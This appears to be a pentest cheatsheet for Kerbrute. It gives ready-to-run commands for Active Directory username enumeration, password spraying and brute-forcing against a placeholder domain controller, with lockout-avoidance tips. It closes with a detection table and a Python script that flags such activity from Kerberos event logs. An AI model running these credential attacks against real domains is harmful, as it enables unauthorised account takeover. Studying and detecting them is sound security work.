Kerbrute Cheatsheet
Fast Kerberos pre-authentication brute-forcer for username enumeration and password spraying.
- GitHub: https://github.com/ropnop/kerbrute
- Does not generate event ID 4625 (logon failure) during username enumeration
- Generates event ID 4768 (TGT request) if Kerberos logging is enabled
- Username enumeration does not cause account lockouts
- Password spraying does count toward lockout thresholds
Basic Syntax
kerbrute <command> [flags]
Commands
| Command | Description |
|---|---|
| userenum | Enumerate valid AD usernames via Kerberos |
| passwordspray | Spray a single password against a list of users |
| bruteuser | Brute-force a single user’s password |
| bruteforce | Brute-force using user:password combo list |
Global Flags
| Flag | Description |
|---|---|
| -d DOMAIN | Domain to authenticate against (required) |
| --dc IP | Domain Controller IP or hostname |
| -t THREADS | Number of threads (default: 10) |
| -o FILE | Output file for results |
| --safe | Safe mode: abort if any account is locked out |
| --downgrade | Downgrade to ARCFOUR-HMAC-MD5 encryption |
| -v | Verbose output |
Username Enumeration
Enumerate Valid Users from Wordlist
kerbrute userenum -d domain.local --dc 172.16.5.5 /path/to/userlist.txt
With Output File
kerbrute userenum -d domain.local --dc 172.16.5.5 -o valid_users.txt /path/to/userlist.txt
How it works: Sends AS-REQ without pre-authentication. If the KDC responds with PRINCIPAL UNKNOWN, the user doesn’t exist. If it prompts for pre-auth, the user is valid.
Password Spraying
Spray Single Password
kerbrute passwordspray -d domain.local --dc 172.16.5.5 valid_users.txt 'Welcome1'
Safe Mode (Stop on Lockout)
kerbrute passwordspray -d domain.local --dc 172.16.5.5 --safe valid_users.txt 'Welcome1'
Brute-Force Single User
kerbrute bruteuser -d domain.local --dc 172.16.5.5 /path/to/passwords.txt jsmith
Brute-Force with Combo List
File format: user:password (one per line)
kerbrute bruteforce -d domain.local --dc 172.16.5.5 combos.txt
Useful Username Wordlists
| List | Description |
|---|---|
| jsmith.txt | 48,705 flast format names |
| jsmith2.txt | Extended flast list |
| top-usernames-shortlist.txt | Common usernames |
Source: statistically-likely-usernames
Detection Notes
| Action | Event ID | Notes |
|---|---|---|
| Username enumeration | 4768 | Only if Kerberos logging enabled via Group Policy |
| Password spraying | 4768 + 4771 | Failed pre-auth counts toward lockout |
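
The detection table above expressed as correlation logic over exported Security events. This is an added example, not code from the cheatsheet or from the kerbrute project. The dictionary keys (`time`, `id`, `user`, `status`, `ip`), the window and threshold values, and the sample events are constructed assumptions; `0x6` and `0x18` are the Kerberos result codes for "principal unknown" and "pre-authentication failed".

```python
from collections import defaultdict
from datetime import datetime, timedelta

# (event ID, Kerberos status code) -> what a burst of these from one source suggests
RULES = {
    (4768, "0x6"): "username enumeration",   # TGT request for an unknown principal
    (4771, "0x18"): "password spraying",     # pre-authentication failed (bad password)
}

def detect(events, window=timedelta(minutes=5), min_users=5):
    """Return sorted (source_ip, label, distinct_users) for every source that
    touched at least min_users distinct accounts inside one sliding window."""
    buckets = defaultdict(list)  # (ip, label) -> [(timestamp, user)]
    for ev in events:
        label = RULES.get((ev["id"], ev["status"].lower()))
        if label is None:
            continue
        ip = ev["ip"].replace("::ffff:", "", 1)  # DCs log IPv4-mapped addresses
        when = datetime.fromisoformat(ev["time"])
        buckets[(ip, label)].append((when, ev["user"].lower()))

    findings = []
    for (ip, label), hits in buckets.items():
        hits.sort()
        best, start = 0, 0
        for end in range(len(hits)):
            while hits[end][0] - hits[start][0] > window:
                start += 1  # drop events that fell out of the window
            best = max(best, len({user for _, user in hits[start:end + 1]}))
        if best >= min_users:
            findings.append((ip, label, best))
    return sorted(findings)

def _ev(sec, eid, user, status, ip="::ffff:10.0.0.50"):
    return {"time": f"2024-01-01T09:00:{sec:02d}", "id": eid,
            "user": user, "status": status, "ip": ip}

# Constructed sample: one host guessing names, then spraying; one user mistyping.
SAMPLE = (
    [_ev(i, 4768, f"guess{i}", "0x6") for i in range(8)]
    + [_ev(20 + i, 4771, u, "0x18") for i, u in
       enumerate(["asmith", "bjones", "cdoe", "dlee", "ewong", "fkhan"])]
    + [_ev(40 + i, 4771, "jsmith", "0x18", "::ffff:10.0.0.77") for i in range(2)]
    + [_ev(50, 4768, "asmith", "0x0", "::ffff:10.0.0.77")]  # normal successful TGT
)

if __name__ == "__main__":
    for finding in detect(SAMPLE):
        print(finding)
```

Counting distinct accounts per source, rather than raw failures, is what separates a spray from a single user retrying a mistyped password.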